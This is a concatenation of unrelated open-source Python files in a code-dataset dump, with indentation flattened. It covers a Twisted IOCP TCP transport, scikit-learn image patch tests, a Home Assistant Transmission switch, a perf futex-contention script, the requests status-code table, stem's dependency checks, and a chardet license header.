def startTLS(self, contextFactory, normal=True):
"""
@see: L{ITLSTransport.startTLS}
"""
_startTLS(self, contextFactory, normal, abstract.FileHandle)
def write(self, data):
"""
Write some data, either directly to the underlying handle or, if TLS
has been started, to the L{TLSMemoryBIOProtocol} for it to encrypt and
send.
@see: L{ITCPTransport.write}
"""
if self.disconnected:
return
if self.TLS:
self.protocol.write(data)
else:
abstract.FileHandle.write(self, data)
def writeSequence(self, iovec):
"""
Write some data, either directly to the underlying handle or, if TLS
has been started, to the L{TLSMemoryBIOProtocol} for it to encrypt and
send.
@see: L{ITCPTransport.writeSequence}
"""
if self.disconnected:
return
if self.TLS:
self.protocol.writeSequence(iovec)
else:
abstract.FileHandle.writeSequence(self, iovec)
def loseConnection(self, reason=None):
"""
Close the underlying handle or, if TLS has been started, first shut it
down.
@see: L{ITCPTransport.loseConnection}
"""
if self.TLS:
if self.connected and not self.disconnecting:
self.protocol.loseConnection()
else:
abstract.FileHandle.loseConnection(self, reason)
def registerProducer(self, producer, streaming):
"""
Register a producer.
If TLS is enabled, the TLS connection handles this.
"""
if self.TLS:
# Registering a producer before we're connected shouldn't be a
# problem. If we end up with a write(), that's already handled in
# the write() code above, and there are no other potential
# side-effects.
self.protocol.registerProducer(producer, streaming)
else:
abstract.FileHandle.registerProducer(self, producer, streaming)
def unregisterProducer(self):
"""
Unregister a producer.
If TLS is enabled, the TLS connection handles this.
"""
if self.TLS:
self.protocol.unregisterProducer()
else:
abstract.FileHandle.unregisterProducer(self)
if _startTLS is not None:
classImplements(Connection, interfaces.ITLSTransport)
class Client(_BaseBaseClient, _BaseTCPClient, Connection):
"""
@ivar _tlsClientDefault: Always C{True}, indicating that this is a client
connection, and by default when TLS is negotiated this class will act as
a TLS client.
"""
addressFamily = socket.AF_INET
socketType = socket.SOCK_STREAM
_tlsClientDefault = True
_commonConnection = Connection
def __init__(self, host, port, bindAddress, connector, reactor):
# ConnectEx documentation says socket _has_ to be bound
if bindAddress is None:
bindAddress = ('', 0)
self.reactor = reactor # createInternetSocket needs this
_BaseTCPClient.__init__(self, host, port, bindAddress, connector,
reactor)
def createInternetSocket(self):
"""
Create a socket registered with the IOCP reactor.
@see: L{_BaseTCPClient}
"""
return self.reactor.createSocket(self.addressFamily, self.socketType)
def _collectSocketDetails(self):
"""
Clean up potentially circular references to the socket and to its
C{getFileHandle} method.
@see: L{_BaseBaseClient}
"""
del self.socket, self.getFileHandle
def _stopReadingAndWriting(self):
"""
Remove the active handle from the reactor.
@see: L{_BaseBaseClient}
"""
self.reactor.removeActiveHandle(self)
def cbConnect(self, rc, bytes, evt):
if rc:
rc = connectExErrors.get(rc, rc)
self.failIfNotConnected(error.getConnectError((rc,
errno.errorcode.get(rc, 'Unknown error'))))
else:
self.socket.setsockopt(
socket.SOL_SOCKET, SO_UPDATE_CONNECT_CONTEXT,
struct.pack('P', self.socket.fileno()))
self.protocol = self.connector.buildProtocol(self.getPeer())
self.connected = True
logPrefix = self._getLogPrefix(self.protocol)
self.logstr = logPrefix + ",client"
self.protocol.makeConnection(self)
self.startReading()
def doConnect(self):
if not hasattr(self, "connector"):
# this happens if we connector.stopConnecting in
# factory.startedConnecting
return
assert _iocp.have_connectex
self.reactor.addActiveHandle(self)
evt = _iocp.Event(self.cbConnect, self)
rc = _iocp.connect(self.socket.fileno(), self.realAddress, evt)
if rc and rc != ERROR_IO_PENDING:
self.cbConnect(rc, 0, evt)
class Server(Connection):
"""
Serverside socket-stream connection class.
I am a serverside network connection transport; a socket which came from an
accept() on a server.
@ivar _tlsClientDefault: Always C{False}, indicating that this is a server
connection, and by default when TLS is negotiated this class will act as
a TLS server.
"""
_tlsClientDefault = False
def __init__(self, sock, protocol, clientAddr, serverAddr, sessionno, reactor):
"""
Server(sock, protocol, client, server, sessionno)
Initialize me with a socket, a protocol, a descriptor for my peer (a
tuple of host, port describing the other end of the connection), an
instance of Port, and a session number.
"""
Connection.__init__(self, sock, protocol, reactor)
self.serverAddr = serverAddr
self.clientAddr = clientAddr
self.sessionno = sessionno
logPrefix = self._getLogPrefix(self.protocol)
self.logstr = "%s,%s,%s" % (logPrefix, sessionno, self.clientAddr.host)
self.repstr = "<%s #%s on %s>" % (self.protocol.__class__.__name__,
self.sessionno, self.serverAddr.port)
self.connected = True
self.startReading()
def __repr__(self):
"""
A string representation of this connection.
"""
return self.repstr
def getHost(self):
"""
Returns an IPv4Address.
This indicates the server's address.
"""
return self.serverAddr
def getPeer(self):
"""
Returns an IPv4Address.
This indicates the client's address.
"""
return self.clientAddr
class Connector(TCPConnector):
def _makeTransport(self):
return Client(self.host, self.port, self.bindAddress, self,
self.reactor)
class Port(_SocketCloser, _LogOwner):
implements(interfaces.IListeningPort)
connected = False
disconnected = False
disconnecting = False
addressFamily = socket.AF_INET
socketType = socket.SOCK_STREAM
_addressType = address.IPv4Address
sessionno = 0
# Actual port number being listened on, only set to a non-None
# value when we are actually listening.
_realPortNumber = None
# A string describing the connections which will be created by this port.
# Normally this is C{"TCP"}, since this is a TCP port, but when the TLS
# implementation re-uses this class it overrides the value with C{"TLS"}.
# Only used for logging.
_type = 'TCP'
def __init__(self, port, factory, backlog=50, interface='', reactor=None):
self.port = port
self.factory = factory
self.backlog = backlog
self.interface = interface
self.reactor = reactor
if isIPv6Address(interface):
self.addressFamily = socket.AF_INET6
self._addressType = address.IPv6Address
def __repr__(self):
if self._realPortNumber is not None:
return "<%s of %s on %s>" % (self.__class__,
self.factory.__class__,
self._realPortNumber)
else:
return "<%s of %s (not listening)>" % (self.__class__,
self.factory.__class__)
def startListening(self):
try:
skt = self.reactor.createSocket(self.addressFamily,
self.socketType)
# TODO: resolve self.interface if necessary
if self.addressFamily == socket.AF_INET6:
addr = socket.getaddrinfo(self.interface, self.port)[0][4]
else:
addr = (self.interface, self.port)
skt.bind(addr)
except socket.error, le:
raise error.CannotListenError, (self.interface, self.port, le)
self.addrLen = _iocp.maxAddrLen(skt.fileno())
# Make sure that if we listened on port 0, we update that to
# reflect what the OS actually assigned us.
self._realPortNumber = skt.getsockname()[1]
log.msg("%s starting on %s" % (self._getLogPrefix(self.factory),
self._realPortNumber))
self.factory.doStart()
skt.listen(self.backlog)
self.connected = True
self.disconnected = False
self.reactor.addActiveHandle(self)
self.socket = skt
self.getFileHandle = self.socket.fileno
self.doAccept()
def loseConnection(self, connDone=failure.Failure(main.CONNECTION_DONE)):
"""
Stop accepting connections on this port.
This will shut down my socket and call self.connectionLost().
It returns a deferred which will fire successfully when the
port is actually closed.
"""
self.disconnecting = True
if self.connected:
self.deferred = defer.Deferred()
self.reactor.callLater(0, self.connectionLost, connDone)
return self.deferred
stopListening = loseConnection
def _logConnectionLostMsg(self):
"""
Log message for closing port
"""
log.msg('(%s Port %s Closed)' % (self._type, self._realPortNumber))
def connectionLost(self, reason):
"""
Cleans up the socket.
"""
self._logConnectionLostMsg()
self._realPortNumber = None
d = None
if hasattr(self, "deferred"):
d = self.deferred
del self.deferred
self.disconnected = True
self.reactor.removeActiveHandle(self)
self.connected = False
self._closeSocket(True)
del self.socket
del self.getFileHandle
try:
self.factory.doStop()
except:
self.disconnecting = False
if d is not None:
d.errback(failure.Failure())
else:
raise
else:
self.disconnecting = False
if d is not None:
d.callback(None)
def logPrefix(self):
"""
Returns the name of my class, to prefix log entries with.
"""
return reflect.qual(self.factory.__class__)
def getHost(self):
"""
Returns an IPv4Address.
This indicates the server's address.
"""
host, port = self.socket.getsockname()[:2]
return self._addressType('TCP', host, port)
def cbAccept(self, rc, bytes, evt):
self.handleAccept(rc, evt)
if not (self.disconnecting or self.disconnected):
self.doAccept()
def handleAccept(self, rc, evt):
if self.disconnecting or self.disconnected:
return False
# possible errors:
# (WSAEMFILE, WSAENOBUFS, WSAENFILE, WSAENOMEM, WSAECONNABORTED)
if rc:
log.msg("Could not accept new connection -- %s (%s)" %
(errno.errorcode.get(rc, 'unknown error'), rc))
return False
else:
evt.newskt.setsockopt(
socket.SOL_SOCKET, SO_UPDATE_ACCEPT_CONTEXT,
struct.pack('P', self.socket.fileno()))
family, lAddr, rAddr = _iocp.get_accept_addrs(evt.newskt.fileno(),
evt.buff)
assert family == self.addressFamily
protocol = self.factory.buildProtocol(
self._addressType('TCP', rAddr[0], rAddr[1]))
if protocol is None:
evt.newskt.close()
else:
s = self.sessionno
self.sessionno = s+1
transport = Server(evt.newskt, protocol,
self._addressType('TCP', rAddr[0], rAddr[1]),
self._addressType('TCP', lAddr[0], lAddr[1]),
s, self.reactor)
protocol.makeConnection(transport)
return True
def doAccept(self):
evt = _iocp.Event(self.cbAccept, self)
# see AcceptEx documentation
evt.buff = buff = _iocp.AllocateReadBuffer(2 * (self.addrLen + 16))
evt.newskt = newskt = self.reactor.createSocket(self.addressFamily,
self.socketType)
rc = _iocp.accept(self.socket.fileno(), newskt.fileno(), buff, evt)
if rc and rc != ERROR_IO_PENDING:
self.handleAccept(rc, evt)
|
bsd-3-clause
|
aminert/scikit-learn
|
sklearn/feature_extraction/tests/test_image.py
|
205
|
10378
|
# Authors: Emmanuelle Gouillart <emmanuelle.gouillart@normalesup.org>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# License: BSD 3 clause
import numpy as np
import scipy as sp
from scipy import ndimage
from nose.tools import assert_equal, assert_true
from numpy.testing import assert_raises
from sklearn.feature_extraction.image import (
img_to_graph, grid_to_graph, extract_patches_2d,
reconstruct_from_patches_2d, PatchExtractor, extract_patches)
from sklearn.utils.graph import connected_components
def test_img_to_graph():
x, y = np.mgrid[:4, :4] - 10
grad_x = img_to_graph(x)
grad_y = img_to_graph(y)
assert_equal(grad_x.nnz, grad_y.nnz)
# Negative elements are the diagonal: the elements of the original
# image. Positive elements are the values of the gradient, they
# should all be equal on grad_x and grad_y
np.testing.assert_array_equal(grad_x.data[grad_x.data > 0],
grad_y.data[grad_y.data > 0])
def test_grid_to_graph():
#Checking that the function works with graphs containing no edges
size = 2
roi_size = 1
# Generating two convex parts with one vertex
# Thus, edges will be empty in _to_graph
mask = np.zeros((size, size), dtype=np.bool)
mask[0:roi_size, 0:roi_size] = True
mask[-roi_size:, -roi_size:] = True
mask = mask.reshape(size ** 2)
A = grid_to_graph(n_x=size, n_y=size, mask=mask, return_as=np.ndarray)
assert_true(connected_components(A)[0] == 2)
# Checking that the function works whatever the type of mask is
mask = np.ones((size, size), dtype=np.int16)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask)
assert_true(connected_components(A)[0] == 1)
# Checking dtype of the graph
mask = np.ones((size, size))
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.bool)
assert_true(A.dtype == np.bool)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.int)
assert_true(A.dtype == np.int)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.float)
assert_true(A.dtype == np.float)
def test_connect_regions():
lena = sp.misc.lena()
for thr in (50, 150):
mask = lena > thr
graph = img_to_graph(lena, mask)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
def test_connect_regions_with_grid():
lena = sp.misc.lena()
mask = lena > 50
graph = grid_to_graph(*lena.shape, mask=mask)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
mask = lena > 150
graph = grid_to_graph(*lena.shape, mask=mask, dtype=None)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
def _downsampled_lena():
lena = sp.misc.lena().astype(np.float32)
lena = (lena[::2, ::2] + lena[1::2, ::2] + lena[::2, 1::2]
+ lena[1::2, 1::2])
lena = (lena[::2, ::2] + lena[1::2, ::2] + lena[::2, 1::2]
+ lena[1::2, 1::2])
lena = lena.astype(np.float)
lena /= 16.0
return lena
def _orange_lena(lena=None):
lena = _downsampled_lena() if lena is None else lena
lena_color = np.zeros(lena.shape + (3,))
lena_color[:, :, 0] = 256 - lena
lena_color[:, :, 1] = 256 - lena / 2
lena_color[:, :, 2] = 256 - lena / 4
return lena_color
def _make_images(lena=None):
lena = _downsampled_lena() if lena is None else lena
# make a collection of lenas
images = np.zeros((3,) + lena.shape)
images[0] = lena
images[1] = lena + 1
images[2] = lena + 2
return images
downsampled_lena = _downsampled_lena()
orange_lena = _orange_lena(downsampled_lena)
lena_collection = _make_images(downsampled_lena)
def test_extract_patches_all():
lena = downsampled_lena
i_h, i_w = lena.shape
p_h, p_w = 16, 16
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(lena, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
def test_extract_patches_all_color():
lena = orange_lena
i_h, i_w = lena.shape[:2]
p_h, p_w = 16, 16
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(lena, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w, 3))
def test_extract_patches_all_rect():
lena = downsampled_lena
lena = lena[:, 32:97]
i_h, i_w = lena.shape
p_h, p_w = 16, 12
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(lena, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
def test_extract_patches_max_patches():
lena = downsampled_lena
i_h, i_w = lena.shape
p_h, p_w = 16, 16
patches = extract_patches_2d(lena, (p_h, p_w), max_patches=100)
assert_equal(patches.shape, (100, p_h, p_w))
expected_n_patches = int(0.5 * (i_h - p_h + 1) * (i_w - p_w + 1))
patches = extract_patches_2d(lena, (p_h, p_w), max_patches=0.5)
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
assert_raises(ValueError, extract_patches_2d, lena, (p_h, p_w),
max_patches=2.0)
assert_raises(ValueError, extract_patches_2d, lena, (p_h, p_w),
max_patches=-1.0)
def test_reconstruct_patches_perfect():
lena = downsampled_lena
p_h, p_w = 16, 16
patches = extract_patches_2d(lena, (p_h, p_w))
lena_reconstructed = reconstruct_from_patches_2d(patches, lena.shape)
np.testing.assert_array_equal(lena, lena_reconstructed)
def test_reconstruct_patches_perfect_color():
lena = orange_lena
p_h, p_w = 16, 16
patches = extract_patches_2d(lena, (p_h, p_w))
lena_reconstructed = reconstruct_from_patches_2d(patches, lena.shape)
np.testing.assert_array_equal(lena, lena_reconstructed)
def test_patch_extractor_fit():
lenas = lena_collection
extr = PatchExtractor(patch_size=(8, 8), max_patches=100, random_state=0)
assert_true(extr == extr.fit(lenas))
def test_patch_extractor_max_patches():
lenas = lena_collection
i_h, i_w = lenas.shape[1:3]
p_h, p_w = 8, 8
max_patches = 100
expected_n_patches = len(lenas) * max_patches
extr = PatchExtractor(patch_size=(p_h, p_w), max_patches=max_patches,
random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
max_patches = 0.5
expected_n_patches = len(lenas) * int((i_h - p_h + 1) * (i_w - p_w + 1)
* max_patches)
extr = PatchExtractor(patch_size=(p_h, p_w), max_patches=max_patches,
random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
def test_patch_extractor_max_patches_default():
lenas = lena_collection
extr = PatchExtractor(max_patches=100, random_state=0)
patches = extr.transform(lenas)
assert_equal(patches.shape, (len(lenas) * 100, 12, 12))
def test_patch_extractor_all_patches():
lenas = lena_collection
i_h, i_w = lenas.shape[1:3]
p_h, p_w = 8, 8
expected_n_patches = len(lenas) * (i_h - p_h + 1) * (i_w - p_w + 1)
extr = PatchExtractor(patch_size=(p_h, p_w), random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
def test_patch_extractor_color():
lenas = _make_images(orange_lena)
i_h, i_w = lenas.shape[1:3]
p_h, p_w = 8, 8
expected_n_patches = len(lenas) * (i_h - p_h + 1) * (i_w - p_w + 1)
extr = PatchExtractor(patch_size=(p_h, p_w), random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w, 3))
def test_extract_patches_strided():
image_shapes_1D = [(10,), (10,), (11,), (10,)]
patch_sizes_1D = [(1,), (2,), (3,), (8,)]
patch_steps_1D = [(1,), (1,), (4,), (2,)]
expected_views_1D = [(10,), (9,), (3,), (2,)]
last_patch_1D = [(10,), (8,), (8,), (2,)]
image_shapes_2D = [(10, 20), (10, 20), (10, 20), (11, 20)]
patch_sizes_2D = [(2, 2), (10, 10), (10, 11), (6, 6)]
patch_steps_2D = [(5, 5), (3, 10), (3, 4), (4, 2)]
expected_views_2D = [(2, 4), (1, 2), (1, 3), (2, 8)]
last_patch_2D = [(5, 15), (0, 10), (0, 8), (4, 14)]
image_shapes_3D = [(5, 4, 3), (3, 3, 3), (7, 8, 9), (7, 8, 9)]
patch_sizes_3D = [(2, 2, 3), (2, 2, 2), (1, 7, 3), (1, 3, 3)]
patch_steps_3D = [(1, 2, 10), (1, 1, 1), (2, 1, 3), (3, 3, 4)]
expected_views_3D = [(4, 2, 1), (2, 2, 2), (4, 2, 3), (3, 2, 2)]
last_patch_3D = [(3, 2, 0), (1, 1, 1), (6, 1, 6), (6, 3, 4)]
image_shapes = image_shapes_1D + image_shapes_2D + image_shapes_3D
patch_sizes = patch_sizes_1D + patch_sizes_2D + patch_sizes_3D
patch_steps = patch_steps_1D + patch_steps_2D + patch_steps_3D
expected_views = expected_views_1D + expected_views_2D + expected_views_3D
last_patches = last_patch_1D + last_patch_2D + last_patch_3D
for (image_shape, patch_size, patch_step, expected_view,
last_patch) in zip(image_shapes, patch_sizes, patch_steps,
expected_views, last_patches):
image = np.arange(np.prod(image_shape)).reshape(image_shape)
patches = extract_patches(image, patch_shape=patch_size,
extraction_step=patch_step)
ndim = len(image_shape)
assert_true(patches.shape[:ndim] == expected_view)
last_patch_slices = [slice(i, i + j, None) for i, j in
zip(last_patch, patch_size)]
assert_true((patches[[slice(-1, None, None)] * ndim] ==
image[last_patch_slices].squeeze()).all())
def test_extract_patches_square():
# test same patch size for all dimensions
lena = downsampled_lena
i_h, i_w = lena.shape
p = 8
expected_n_patches = ((i_h - p + 1), (i_w - p + 1))
patches = extract_patches(lena, patch_shape=p)
assert_true(patches.shape == (expected_n_patches[0], expected_n_patches[1],
p, p))
def test_width_patch():
# width and height of the patch should be less than the image
x = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
assert_raises(ValueError, extract_patches_2d, x, (4, 1))
assert_raises(ValueError, extract_patches_2d, x, (1, 4))
|
bsd-3-clause
|
dmeulen/home-assistant
|
homeassistant/components/switch/transmission.py
|
29
|
3112
|
"""
Support for setting the Transmission BitTorrent client Turtle Mode.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/switch.transmission/
"""
import logging
import voluptuous as vol
from homeassistant.components.switch import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_HOST, CONF_NAME, CONF_PORT, CONF_PASSWORD, CONF_USERNAME, STATE_OFF,
STATE_ON)
from homeassistant.helpers.entity import ToggleEntity
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['transmissionrpc==0.11']
_LOGGING = logging.getLogger(__name__)
DEFAULT_NAME = 'Transmission Turtle Mode'
DEFAULT_PORT = 9091
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_USERNAME): cv.string,
})
# pylint: disable=unused-argument
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the Transmission switch."""
import transmissionrpc
from transmissionrpc.error import TransmissionError
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
port = config.get(CONF_PORT)
transmission_api = transmissionrpc.Client(
host, port=port, user=username, password=password)
try:
transmission_api.session_stats()
except TransmissionError:
_LOGGING.error("Connection to Transmission API failed")
return False
add_devices([TransmissionSwitch(transmission_api, name)])
class TransmissionSwitch(ToggleEntity):
"""Representation of a Transmission switch."""
def __init__(self, transmission_client, name):
"""Initialize the Transmission switch."""
self._name = name
self.transmission_client = transmission_client
self._state = STATE_OFF
@property
def name(self):
"""Return the name of the switch."""
return self._name
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def should_poll(self):
"""Poll for status regularly."""
return True
@property
def is_on(self):
"""Return true if device is on."""
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
_LOGGING.debug("Turning Turtle Mode of Transmission on")
self.transmission_client.set_session(alt_speed_enabled=True)
def turn_off(self, **kwargs):
"""Turn the device off."""
_LOGGING.debug("Turning Turtle Mode of Transmission off")
self.transmission_client.set_session(alt_speed_enabled=False)
def update(self):
"""Get the latest data from Transmission and updates the state."""
active = self.transmission_client.get_session().alt_speed_enabled
self._state = STATE_ON if active else STATE_OFF
|
mit
|
civato/CivZ-SnapKat-SM_9005-900T
|
tools/perf/scripts/python/futex-contention.py
|
11261
|
1486
|
# futex contention
# (c) 2010, Arnaldo Carvalho de Melo <acme@redhat.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
process_names = {}
thread_thislock = {}
thread_blocktime = {}
lock_waits = {} # long-lived stats on (tid,lock) blockage elapsed time
process_names = {} # long-lived pid-to-execname mapping
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, uaddr, op, val, utime, uaddr2, val3):
cmd = op & FUTEX_CMD_MASK
if cmd != FUTEX_WAIT:
return # we don't care about originators of WAKE events
process_names[tid] = comm
thread_thislock[tid] = uaddr
thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, ret):
if thread_blocktime.has_key(tid):
elapsed = nsecs(s, ns) - thread_blocktime[tid]
add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
del thread_blocktime[tid]
del thread_thislock[tid]
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
for (tid, lock) in lock_waits:
min, max, avg, count = lock_waits[tid, lock]
print "%s[%d] lock %x contended %d times, %d avg ns" % \
(process_names[tid], tid, lock, count, avg)
|
gpl-2.0
|
manaschaturvedi/oscarbuddy
|
requests/status_codes.py
|
926
|
3200
|
# -*- coding: utf-8 -*-
from .structures import LookupDict
_codes = {
# Informational.
100: ('continue',),
101: ('switching_protocols',),
102: ('processing',),
103: ('checkpoint',),
122: ('uri_too_long', 'request_uri_too_long'),
200: ('ok', 'okay', 'all_ok', 'all_okay', 'all_good', '\\o/', '✓'),
201: ('created',),
202: ('accepted',),
203: ('non_authoritative_info', 'non_authoritative_information'),
204: ('no_content',),
205: ('reset_content', 'reset'),
206: ('partial_content', 'partial'),
207: ('multi_status', 'multiple_status', 'multi_stati', 'multiple_stati'),
208: ('already_reported',),
226: ('im_used',),
# Redirection.
300: ('multiple_choices',),
301: ('moved_permanently', 'moved', '\\o-'),
302: ('found',),
303: ('see_other', 'other'),
304: ('not_modified',),
305: ('use_proxy',),
306: ('switch_proxy',),
307: ('temporary_redirect', 'temporary_moved', 'temporary'),
308: ('permanent_redirect',
'resume_incomplete', 'resume',), # These 2 to be removed in 3.0
# Client Error.
400: ('bad_request', 'bad'),
401: ('unauthorized',),
402: ('payment_required', 'payment'),
403: ('forbidden',),
404: ('not_found', '-o-'),
405: ('method_not_allowed', 'not_allowed'),
406: ('not_acceptable',),
407: ('proxy_authentication_required', 'proxy_auth', 'proxy_authentication'),
408: ('request_timeout', 'timeout'),
409: ('conflict',),
410: ('gone',),
411: ('length_required',),
412: ('precondition_failed', 'precondition'),
413: ('request_entity_too_large',),
414: ('request_uri_too_large',),
415: ('unsupported_media_type', 'unsupported_media', 'media_type'),
416: ('requested_range_not_satisfiable', 'requested_range', 'range_not_satisfiable'),
417: ('expectation_failed',),
418: ('im_a_teapot', 'teapot', 'i_am_a_teapot'),
422: ('unprocessable_entity', 'unprocessable'),
423: ('locked',),
424: ('failed_dependency', 'dependency'),
425: ('unordered_collection', 'unordered'),
426: ('upgrade_required', 'upgrade'),
428: ('precondition_required', 'precondition'),
429: ('too_many_requests', 'too_many'),
431: ('header_fields_too_large', 'fields_too_large'),
444: ('no_response', 'none'),
449: ('retry_with', 'retry'),
450: ('blocked_by_windows_parental_controls', 'parental_controls'),
451: ('unavailable_for_legal_reasons', 'legal_reasons'),
499: ('client_closed_request',),
# Server Error.
500: ('internal_server_error', 'server_error', '/o\\', '✗'),
501: ('not_implemented',),
502: ('bad_gateway',),
503: ('service_unavailable', 'unavailable'),
504: ('gateway_timeout',),
505: ('http_version_not_supported', 'http_version'),
506: ('variant_also_negotiates',),
507: ('insufficient_storage',),
509: ('bandwidth_limit_exceeded', 'bandwidth'),
510: ('not_extended',),
}
codes = LookupDict(name='status_codes')
for (code, titles) in list(_codes.items()):
for title in titles:
setattr(codes, title, code)
if not title.startswith('\\'):
setattr(codes, title.upper(), code)
|
mit
|
ewongbb/stem
|
stem/prereq.py
|
1
|
4914
|
# Copyright 2012-2017, Damian Johnson and The Tor Project
# See LICENSE for licensing information
"""
Checks for stem dependencies. We require python 2.6 or greater (including the
3.x series), but note we'll be bumping our requirements to python 2.7 in stem
2.0. Other requirements for complete functionality are...
* cryptography module
* validating descriptor signature integrity
::
check_requirements - checks for minimum requirements for running stem
is_python_3 - checks if python 3.0 or later is available
is_crypto_available - checks if the cryptography module is available
"""
import inspect
import sys
try:
# added in python 3.2
from functools import lru_cache
except ImportError:
from stem.util.lru_cache import lru_cache
CRYPTO_UNAVAILABLE = "Unable to import the cryptography module. Because of this we'll be unable to verify descriptor signature integrity. You can get cryptography from: https://pypi.python.org/pypi/cryptography"
PYNACL_UNAVAILABLE = "Unable to import the pynacl module. Because of this we'll be unable to verify descriptor ed25519 certificate integrity. You can get pynacl from https://pypi.python.org/pypi/PyNaCl/"
def check_requirements():
"""
Checks that we meet the minimum requirements to run stem. If we don't then
this raises an ImportError with the issue.
:raises: **ImportError** with the problem if we don't meet stem's
requirements
"""
major_version, minor_version = sys.version_info[0:2]
if major_version < 2 or (major_version == 2 and minor_version < 6):
raise ImportError('stem requires python version 2.6 or greater')
def _is_python_26():
"""
Checks if we're running python 2.6. This isn't for users as it'll be removed
in stem 2.0 (when python 2.6 support goes away).
:returns: **True** if we're running python 2.6, **False** otherwise
"""
major_version, minor_version = sys.version_info[0:2]
return major_version == 2 and minor_version == 6
def is_python_27():
"""
Checks if we're running python 2.7 or above (including the 3.x series).
.. deprecated:: 1.5.0
Function lacks much utility and will be eventually removed.
:returns: **True** if we meet this requirement and **False** otherwise
"""
major_version, minor_version = sys.version_info[0:2]
return major_version > 2 or (major_version == 2 and minor_version >= 7)
def is_python_3():
"""
Checks if we're in the 3.0 - 3.x range.
:returns: **True** if we meet this requirement and **False** otherwise
"""
return sys.version_info[0] == 3
@lru_cache()
def is_crypto_available():
"""
Checks if the cryptography functions we use are available. This is used for
verifying relay descriptor signatures.
:returns: **True** if we can use the cryptography module and **False**
otherwise
"""
from stem.util import log
try:
from cryptography.utils import int_from_bytes, int_to_bytes
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.serialization import load_der_public_key
if not hasattr(rsa.RSAPrivateKey, 'sign'):
raise ImportError()
return True
except ImportError:
log.log_once('stem.prereq.is_crypto_available', log.INFO, CRYPTO_UNAVAILABLE)
return False
@lru_cache()
def is_mock_available():
"""
Checks if the mock module is available. In python 3.3 and up it is a builtin
unittest module, but before this it needed to be `installed separately
<https://pypi.python.org/pypi/mock/>`_. Imports should be as follows....
::
try:
# added in python 3.3
from unittest.mock import Mock
except ImportError:
from mock import Mock
:returns: **True** if the mock module is available and **False** otherwise
"""
try:
# checks for python 3.3 version
import unittest.mock
return True
except ImportError:
pass
try:
import mock
# check for mock's patch.dict() which was introduced in version 0.7.0
if not hasattr(mock.patch, 'dict'):
raise ImportError()
# check for mock's new_callable argument for patch() which was introduced in version 0.8.0
if 'new_callable' not in inspect.getargspec(mock.patch).args:
raise ImportError()
return True
except ImportError:
return False
@lru_cache()
def _is_pynacl_available():
"""
Checks if the pynacl functions we use are available. This is used for
verifying ed25519 certificates in relay descriptor signatures.
:returns: **True** if we can use pynacl and **False** otherwise
"""
from stem.util import log
try:
from nacl import encoding
from nacl import signing
return True
except ImportError:
log.log_once('stem.prereq._is_pynacl_available', log.INFO, PYNACL_UNAVAILABLE)
return False
|
lgpl-3.0
|
timothsp/where2ate
|
venv/lib/python3.3/site-packages/pip/_vendor/requests/packages/chardet/langthaimodel.py
|
2930
|
11275
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
